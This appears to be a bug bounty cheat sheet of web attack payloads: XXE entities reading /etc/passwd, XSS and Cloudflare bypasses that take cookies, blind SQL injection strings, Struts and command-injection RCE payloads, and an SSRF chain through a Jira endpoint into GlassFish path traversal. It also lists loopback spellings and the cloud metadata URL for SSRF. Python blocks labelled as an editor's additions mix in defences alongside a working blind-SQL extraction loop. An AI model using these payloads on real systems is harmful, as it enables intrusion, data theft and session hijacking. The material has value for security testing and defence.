Bug Bounty Tips

XXE
-----------------

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "Gkhck"> ]>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>                                  (XXE & RCE)

<!ENTITY body SYSTEM "file:///etc/passwd" >
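The payloads above only work if the parser is willing to declare and resolve external entities. As an added example (editor's own code, not from the original page), here is a parser built on Python's standard-library expat bindings that rejects the file:///etc/passwd payload above while still parsing ordinary documents. The XXE_PAYLOAD string is the payload from this section; BENIGN_XML is a constructed sample input.

```python
import xml.parsers.expat as expat

# The page's external-entity payload, embedded here as the untrusted input.
XXE_PAYLOAD = b"""<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

# Constructed benign document for comparison.
BENIGN_XML = b"<foo><bar>hello</bar></foo>"


class XxeBlocked(Exception):
    """Raised when the document uses a DTD feature we refuse to process."""


def parse_untrusted(data: bytes, allow_dtd: bool = False) -> list:
    """Parse XML from an untrusted source and return (event, value) tuples.

    By default any DOCTYPE is rejected outright, which is the simplest safe
    setting. With allow_dtd=True an internal DTD is accepted, but external
    entity declarations and external entity references are still refused,
    so a SYSTEM/PUBLIC entity can never reach the filesystem or the network.
    """
    parser = expat.ParserCreate()
    # Never load or expand parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    events = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise XxeBlocked(f"DOCTYPE {name!r} not allowed")
        if sysid is not None or pubid is not None:
            raise XxeBlocked(f"external DTD {sysid!r} not allowed")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Internal entities (value is not None) are fine; SYSTEM/PUBLIC are not.
        if sysid is not None or pubid is not None:
            raise XxeBlocked(f"external entity {name!r} -> {sysid!r} not allowed")

    def on_external_ref(context, base, sysid, pubid):
        # Only reached if a declaration slipped through; refuse to resolve it.
        raise XxeBlocked(f"external entity reference {sysid!r} refused")

    def on_text(text):
        # expat may deliver character data in several chunks; merge them.
        if events and events[-1][0] == "text":
            events[-1] = ("text", events[-1][1] + text)
        else:
            events.append(("text", text))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda tag, attrs: events.append(("start", tag))
    parser.EndElementHandler = lambda tag: events.append(("end", tag))
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return events


def is_xxe_attempt(data: bytes) -> bool:
    """True if the document tries to declare or reference an external entity."""
    try:
        parse_untrusted(data, allow_dtd=True)
    except XxeBlocked:
        return True
    return False


if __name__ == "__main__":
    print(parse_untrusted(BENIGN_XML))
    print("XXE attempt:", is_xxe_attempt(XXE_PAYLOAD))
```

Rejecting the DOCTYPE entirely (the default here) is the setting to reach for when the application never needs a DTD; the allow_dtd path shows the narrower rule for the cases where one is required.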

XSS & WAF / CLOUDFLARE BYPASS
---------------------------------------------------

"'--!>'><img onerror=alert(1) src>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

<input onfocus="alert(0);" autofocus>

&lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;

&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>

javascript:"/*'/*`/* ?<html \" onmouseover=/*&lt;svg/*/onload=alert()//>

<iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e">    (Cloudflare bypass)
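Two of the href payloads above (the %26%237javascrip%26%239t: one and the j&Tab;a&Tab;v... one) work because a browser percent-decodes, entity-decodes and then strips tabs, newlines and leading control characters before it looks at the URL scheme, so a filter that checks the raw string for "javascript:" never sees it. As an added example (editor's own code, not from the original page), the following Python reproduces that decoding chain on the server side so the check is made on what the browser will actually execute. The two payload strings are copied from this section; the scheme allowlist is an assumption for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# Payloads from the page. The first is the raw query-string form, so it is
# percent-decoded the way a web framework would decode a parameter.
OBFUSCATED_URLS = [
    unquote("%26%237javascrip%26%239t:alert%26lpar;document.domain)"),
    "j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;"
    "\\u0061\\u006C\\u0065\\u0072\\u0074&lpar;this['document']['cookie']&rpar;",
]

# Assumed allowlist: schemes this application is willing to put in an href.
SAFE_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def naive_is_javascript_url(raw: str) -> bool:
    """The check the payloads are designed to defeat: look at the raw bytes."""
    return raw.lower().startswith("javascript:")


def normalize_url_attr(raw: str) -> str:
    """Apply the same transformations a browser applies to an href value."""
    # 1. Attribute values are entity-decoded before the URL parser sees them.
    #    html.unescape follows the HTML5 rules, including legacy numeric
    #    references without a trailing ';' such as &#7 and &#9.
    text = html.unescape(raw)
    # 2. The URL parser strips leading and trailing C0 controls and spaces ...
    text = text.strip(_C0_AND_SPACE)
    # 3. ... and removes ASCII tab, LF and CR anywhere in the input.
    return re.sub(r"[\t\n\r]", "", text)


def is_javascript_url(raw: str) -> bool:
    return normalize_url_attr(raw).lower().startswith("javascript:")


def allowed_href(raw: str):
    """Return a normalized href, or None if its scheme is not allowlisted.

    Relative URLs (no scheme) are accepted; anything with an unexpected
    scheme, javascript: included, is refused rather than denylisted.
    """
    url = normalize_url_attr(raw)
    match = _SCHEME.match(url)
    if match and match.group(1).lower() not in SAFE_SCHEMES:
        return None
    return url


if __name__ == "__main__":
    for payload in OBFUSCATED_URLS:
        print(repr(payload))
        print("  naive check :", naive_is_javascript_url(payload))
        print("  normalized  :", normalize_url_attr(payload))
        print("  is js url   :", is_javascript_url(payload))
```

The allowlist in allowed_href is the part worth copying: once the value is normalized, deciding on the scheme you accept is far more robust than enumerating the ones you fear.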

SQL INJECTION & BLIND
-----------------------
'-if(1=2,'0','1')-

/' 

%23'

1+or+if(mid(@@version,1,1)=5,1,2)=2%23'

1'=sleep(10)='1 

--'

460-'''

id=460-4

1 ' or true# 

1 ' or false#

1 AND 1=(select 1 from PG_SLEEP(10))--

' AND 1=(select 1 from PG_SLEEP(10)) OR '1'='

'=IF(MID(VERSION(),1,1)=1,SLEEP(10),0)='1

'=IF(MID(VERSION(),1,1)=5,SLEEP(10),0)='1

action=show_support_breakups&brids=["')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/%23"]     (the hex literal decodes to the string 5.6.33-log, i.e. a MySQL version banner used as a stand-in for @@version)

(CASE SUBSTR((SELECT email FROM users WHERE username = 'jobertabma'), 1, 1) WHEN 'a' THEN (CASE id WHEN 429944 THEN 2 ELSE 1 END) ELSE 1 END)

%28CASE%20SUBSTR%28%28SELECT%20email%20FROM%20users%20WHERE%20username%20%3D%20%27jobertabma%27%29%2C%201%2C%201%29%20WHEN%20%27a%27%20THEN%20%28CASE%20id%20WHEN%20429944%20THEN%202%20ELSE%201%20END%29%20ELSE%201%20END%29

1111-sleep/*f*/(10)

uid-sleep(5)
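The CASE/SUBSTR payload above turns an ORDER BY injection into a one-bit oracle: when the guessed character is right the sort key changes, and the row order tells you so. As an added example (editor's own code, not from the original page), here is a self-contained Python/SQLite simulation of that technique: a vulnerable endpoint that concatenates the sort expression, the oracle built from the page's payload shape, a character-by-character extraction loop, and the allowlist fix. The users table, the 429944 id and the e-mail value are constructed for the demonstration; only the username comes from the payload.

```python
import sqlite3

# Constructed sample data; the target e-mail is what the attacker extracts.
SECRET_EMAIL = "jobert@example.com"
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789@._-+"
ALLOWED_SORT = {"id", "username"}


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),
        (2, "bob", "bob@example.com"),
        (429944, "jobertabma", SECRET_EMAIL),
    ])
    return db


def list_users_vulnerable(db, sort: str) -> list:
    """The bug: the sort expression goes straight into the query text."""
    return [row[0] for row in db.execute(f"SELECT id FROM users ORDER BY {sort}")]


def list_users_fixed(db, sort: str) -> list:
    """The fix: ORDER BY cannot be parameterised, so allowlist the column."""
    if sort not in ALLOWED_SORT:
        raise ValueError("unsupported sort column")
    return [row[0] for row in db.execute(f"SELECT id FROM users ORDER BY {sort}")]


def oracle(db, pos: int, ch: str) -> bool:
    """True iff character `pos` (1-based) of the target e-mail equals `ch`.

    Same shape as the page's payload: a CASE on SUBSTR() of a sub-select,
    used as the sort key. A correct guess sorts ascending by id, a wrong one
    descending, so the first id returned leaks one bit.
    """
    ch = ch.replace("'", "''")
    payload = (
        "(CASE SUBSTR((SELECT email FROM users WHERE username = 'jobertabma'), "
        f"{pos}, 1) WHEN '{ch}' THEN id ELSE -id END)"
    )
    return list_users_vulnerable(db, payload)[0] == 1


def extract_email(db, max_len: int = 64) -> str:
    """Boolean-blind extraction: one position at a time, one guess per query."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(db, pos, ch):
                result += ch
                break
        else:
            return result  # nothing matched: we are past the end of the string
    return result


if __name__ == "__main__":
    db = make_db()
    print("extracted:", extract_email(db))
```

A real target would replace list_users_vulnerable with an HTTP request and compare the first row of the response; the loop and the payload stay the same. Binary search on the character (SUBSTR(...) > 'm') cuts the query count from about forty per character to about six.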

Remote Code Execution
-----------------------------

</> ;+cat+/e'tc/pass'wd </>

Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Ack-Th3g3nt3lman-POC',4*4)}.multipart/form-data

</> c\\a\\t+/et\\c/pas\\swd </>

It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\


Tips
--------

Jira : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance

I searched for GlassFish exploits and, luckily, found a GET-based one: https://www.exploit-db.com/exploits/39241/

Fail : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Success : https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2f%25c0%25ae%25c0%25ae%2fetc%2fpasswd

The only difference between the two is that the second URL is URL-encoded a second time (%2f for "/", %25c0%25ae for the overlong-UTF-8 "." sequence %c0%ae), so after the Jira endpoint decodes the consumerUri parameter once, the traversal sequence reaches GlassFish intact.

1- Don't stop when you get a forbidden/not found response from the target you are testing; run dirsearch or any tool you prefer to find endpoints.

If a CSP policy points to a directory and you use %2f to encode "/", the URL is still considered to be inside that directory. All browsers seem to agree on that. https://jsbin.com/werevijewa/edit?html,output

This basic URL returns a 200 status code. The input poc=35141008' returns a 500 error and poc=35141008'%23 does as well, but poc=35141008'' returns a 200 status.
After this I tried a simple 35141008 OR 2 LIKE 2%23, which worked, while 35141008 OR 2 LIKE 1%23 returned a 500 error, proving that boolean SQLi was possible here.


When a subdomain is vulnerable to takeover, it will usually return a 404 error, meaning that there is no content on the server for it (but see the note on NXDOMAIN below: a 404 alone does not prove anything).

For those who don't know: if you find endpoints ending in .action, .do or .go, the web application is most likely running Struts 2.

SSRF ByPass
----------------
127.0.0.1
127.0.1
127.1
127.000.000.001
2130706433
0x7F.0x00.0x00.0x01
0x7F.1
0x7F000001
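Every entry in the list above is the same address, 127.0.0.1, written in a form that libc's inet_aton() accepts but a string comparison against "127.0.0.1" does not. As an added example (editor's own code, not from the original page), the following Python reimplements the inet_aton parsing rules (1 to 4 dot-separated parts, each decimal, octal or hex, the last part filling the remaining bytes) and uses them to canonicalise a host before applying an SSRF block decision; the metadata address from the "classic attack" below and the IPv4-mapped IPv6 form are included because they slip past the same naive check. The naive blocklist is an assumption for the demonstration.

```python
import ipaddress
import re

# The loopback spellings listed on the page.
LOOPBACK_SPELLINGS = [
    "127.0.0.1", "127.0.1", "127.1", "127.000.000.001",
    "2130706433", "0x7F.0x00.0x00.0x01", "0x7F.1", "0x7F000001",
]

# One part of an inet_aton literal: hex (0x..), octal (leading 0) or decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _part_value(part: str) -> int:
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_lenient(text: str):
    """Parse an IPv4 literal the way libc inet_aton() does; None if invalid.

    With fewer than four parts the last part fills all remaining bytes,
    so "127.1" is 127.0.0.1 and "2130706433" is the whole address.
    """
    parts = text.split(".")
    if not 1 <= len(parts) <= 4 or any(not _PART.match(p) for p in parts):
        return None
    *head, last = [_part_value(p) for p in parts]
    if any(v > 0xFF for v in head):
        return None
    tail_bits = 8 * (4 - len(head))
    if last >= 1 << tail_bits:
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    return (addr << tail_bits) | last


def canonical_ipv4(text: str):
    """Dotted-quad form of an inet_aton literal, or None."""
    n = inet_aton_lenient(text)
    return str(ipaddress.IPv4Address(n)) if n is not None else None


def naive_is_blocked(host: str) -> bool:
    """Assumed string blocklist: defeated by every alternate spelling."""
    return host in {"127.0.0.1", "169.254.169.254", "localhost"}


def is_blocked(host: str) -> bool:
    """Canonicalise first, then decide on the address rather than the spelling.

    Returns False for names that are not IP literals: those must be resolved
    and the resolved address checked with this same function (and the
    connection pinned to it, or DNS rebinding reopens the hole).
    """
    if host.lower() == "localhost":
        return True
    n = inet_aton_lenient(host)
    if n is not None:
        ip = ipaddress.IPv4Address(n)
    else:
        try:
            ip = ipaddress.ip_address(host)  # IPv6 literals and strict forms
        except ValueError:
            return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


if __name__ == "__main__":
    for spelling in LOOPBACK_SPELLINGS:
        print(f"{spelling:22} -> {canonical_ipv4(spelling)}  "
              f"naive={naive_is_blocked(spelling)} canonical={is_blocked(spelling)}")
```

The same canonicalisation is needed on the response side of a fetch feature: a 302 to http://127.1/ or to the metadata address bypasses a check that only ran on the original URL.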

Note that receiving a 404 HTTP error does not mean that subdomain takeover is possible at all! As I said before, the services have dedicated VPSs. For a successful subdomain takeover the DNS request should always return NXDOMAIN. Given a pair of source and canonical domain names, if the base domain of the canonical domain name is available for registration, the source domain name is vulnerable to subdomain takeover.

Example: a domain name (e.g., sub.example.com) uses a CNAME record pointing to another domain (sub.example.com CNAME anotherdomain.com). At some point anotherdomain.com expires and becomes available for registration by anyone.
Since the CNAME record is not deleted from the example.com DNS zone, whoever registers anotherdomain.com has full control over sub.example.com for as long as that DNS record is present.
The same applies to NS delegation: if the base domain of the canonical domain name of at least one NS record is available for registration, the source domain name is vulnerable to subdomain takeover.

SSRF, a classic attack: /fetch?url=http://169.254.169.254/latest/meta-data/ (the cloud instance metadata endpoint)


=> I'll update...